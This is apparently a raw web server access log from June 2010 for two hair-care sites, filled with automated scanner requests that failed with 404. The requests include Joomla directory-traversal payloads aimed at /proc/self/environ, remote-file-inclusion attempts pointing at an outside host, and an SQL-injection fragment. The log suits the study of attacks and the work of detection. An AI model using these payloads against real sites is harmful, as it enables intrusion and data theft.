77.88.25.28 - - [20/Jun/2010:17:01:36 -0700] "GET /freehairsecretsphp/viewtopic.php?p=4607 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
69.4.232.155 - - [20/Jun/2010:17:02:03 -0700] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.37.19.40 - - [20/Jun/2010:17:02:03 -0700] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.37.19.40 - - [20/Jun/2010:17:02:37 -0700] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
69.4.232.155 - - [20/Jun/2010:17:02:43 -0700] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
64.156.24.220 - - [20/Jun/2010:17:02:53 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
64.156.24.220 - - [20/Jun/2010:17:02:53 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
64.156.24.220 - - [20/Jun/2010:17:02:53 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
64.156.24.220 - - [20/Jun/2010:17:02:56 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
64.156.24.220 - - [20/Jun/2010:17:02:56 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
64.156.24.220 - - [20/Jun/2010:17:02:56 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
69.4.232.155 - - [20/Jun/2010:17:03:05 -0700] "GET /logs/access.log/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
69.4.232.155 - - [20/Jun/2010:17:03:05 -0700] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
69.4.232.155 - - [20/Jun/2010:17:03:05 -0700] "GET /logs/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
183.180.127.14 - - [20/Jun/2010:17:03:56 -0700] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
64.156.24.220 - - [20/Jun/2010:17:04:57 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
64.156.24.220 - - [20/Jun/2010:17:04:57 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
64.156.24.220 - - [20/Jun/2010:17:04:57 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
64.156.24.220 - - [20/Jun/2010:17:04:57 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
64.156.24.220 - - [20/Jun/2010:17:04:58 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
64.156.24.220 - - [20/Jun/2010:17:04:58 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
183.180.127.14 - - [20/Jun/2010:17:05:04 -0700] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:17:12:00 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:17:12:07 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:17:13:09 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:17:13:24 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:17:13:32 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:17:13:42 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:17:15:10 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:17:15:11 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
65.60.49.18 - - [20/Jun/2010:17:15:54 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
65.60.49.18 - - [20/Jun/2010:17:15:59 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:16:01 -0700] "GET /logs/access_100503.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:16:01 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:16:01 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:16:17 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:16:26 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
65.60.49.18 - - [20/Jun/2010:17:16:38 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:16:51 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
65.60.49.18 - - [20/Jun/2010:17:16:51 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
65.60.49.18 - - [20/Jun/2010:17:16:51 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
65.60.49.18 - - [20/Jun/2010:17:16:53 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
65.60.49.18 - - [20/Jun/2010:17:16:53 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
65.60.49.18 - - [20/Jun/2010:17:16:53 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
65.60.49.18 - - [20/Jun/2010:17:16:54 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
65.60.49.18 - - [20/Jun/2010:17:16:55 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
65.60.49.18 - - [20/Jun/2010:17:16:55 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
65.60.49.18 - - [20/Jun/2010:17:16:57 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
69.4.232.155 - - [20/Jun/2010:17:16:57 -0700] "GET /logs/access.log/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
69.4.232.155 - - [20/Jun/2010:17:16:57 -0700] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
69.4.232.155 - - [20/Jun/2010:17:16:57 -0700] "GET /logs/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.37.19.40 - - [20/Jun/2010:17:17:00 -0700] "GET /logs/access.log/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.37.19.40 - - [20/Jun/2010:17:17:00 -0700] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.37.19.40 - - [20/Jun/2010:17:17:00 -0700] "GET /logs/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
65.60.49.18 - - [20/Jun/2010:17:17:01 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
65.60.49.18 - - [20/Jun/2010:17:17:11 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
65.60.49.18 - - [20/Jun/2010:17:17:11 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
65.60.49.18 - - [20/Jun/2010:17:17:11 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
65.60.49.18 - - [20/Jun/2010:17:17:13 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:17:24 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:17:17:27 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:17:17:43 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
65.60.49.18 - - [20/Jun/2010:17:17:43 -0700] "GET /logs/access_100531.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:17:43 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:17:43 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:18:02 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
65.60.49.18 - - [20/Jun/2010:17:18:09 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:18:11 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:18:40 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
173.184.11.208 - - [20/Jun/2010:17:18:52 -0700] "GET /logs/access_100125+and+0=1+union+select+.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:19:01 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:19:16 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:17:19:24 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:17:19:48 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:19:54 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:17:21:04 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:17:21:06 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:17:21:07 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:21:17 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:17:21:20 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
65.60.49.18 - - [20/Jun/2010:17:21:25 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:17:21:34 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:17:21:47 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:23:01 -0700] "GET /logs/access_100503.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:23:01 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:23:01 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
183.180.127.14 - - [20/Jun/2010:17:23:27 -0700] "GET /logs/access.log/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
183.180.127.14 - - [20/Jun/2010:17:23:27 -0700] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
183.180.127.14 - - [20/Jun/2010:17:23:28 -0700] "GET /logs/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
78.110.50.135 - - [20/Jun/2010:17:24:05 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
78.110.50.135 - - [20/Jun/2010:17:24:05 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
91.121.210.81 - - [20/Jun/2010:17:24:12 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
78.110.50.135 - - [20/Jun/2010:17:24:18 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
91.121.210.81 - - [20/Jun/2010:17:24:18 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
69.4.232.155 - - [20/Jun/2010:17:24:20 -0700] "GET /logs/access.log/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
69.4.232.155 - - [20/Jun/2010:17:24:21 -0700] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
69.4.232.155 - - [20/Jun/2010:17:24:21 -0700] "GET /logs/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
91.121.210.81 - - [20/Jun/2010:17:24:22 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
174.37.19.40 - - [20/Jun/2010:17:24:31 -0700] "GET /logs/access.log/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.37.19.40 - - [20/Jun/2010:17:24:31 -0700] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.37.19.40 - - [20/Jun/2010:17:24:31 -0700] "GET /logs/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
91.121.210.81 - - [20/Jun/2010:17:24:44 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
78.110.50.135 - - [20/Jun/2010:17:24:58 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:25:02 -0700] "GET /logs/access_100419.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:25:02 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:25:02 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
91.121.210.81 - - [20/Jun/2010:17:27:33 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
178.208.83.28 - - [20/Jun/2010:17:27:47 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:27:48 -0700] "GET /logs/access_100531.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:27:48 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:27:48 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
178.208.83.28 - - [20/Jun/2010:17:27:54 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
91.121.210.81 - - [20/Jun/2010:17:28:02 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
65.60.49.18 - - [20/Jun/2010:17:28:10 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
78.110.50.135 - - [20/Jun/2010:17:28:12 -0700] "GET /logs/access_100125.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
78.110.50.135 - - [20/Jun/2010:17:28:12 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
78.110.50.135 - - [20/Jun/2010:17:28:13 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
91.121.210.81 - - [20/Jun/2010:17:29:29 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
65.60.49.18 - - [20/Jun/2010:17:29:40 -0700] "GET /logs/access_100405.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:29:40 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:29:40 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:29:42 -0700] "GET /logs/access_100419.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:29:42 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:29:42 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
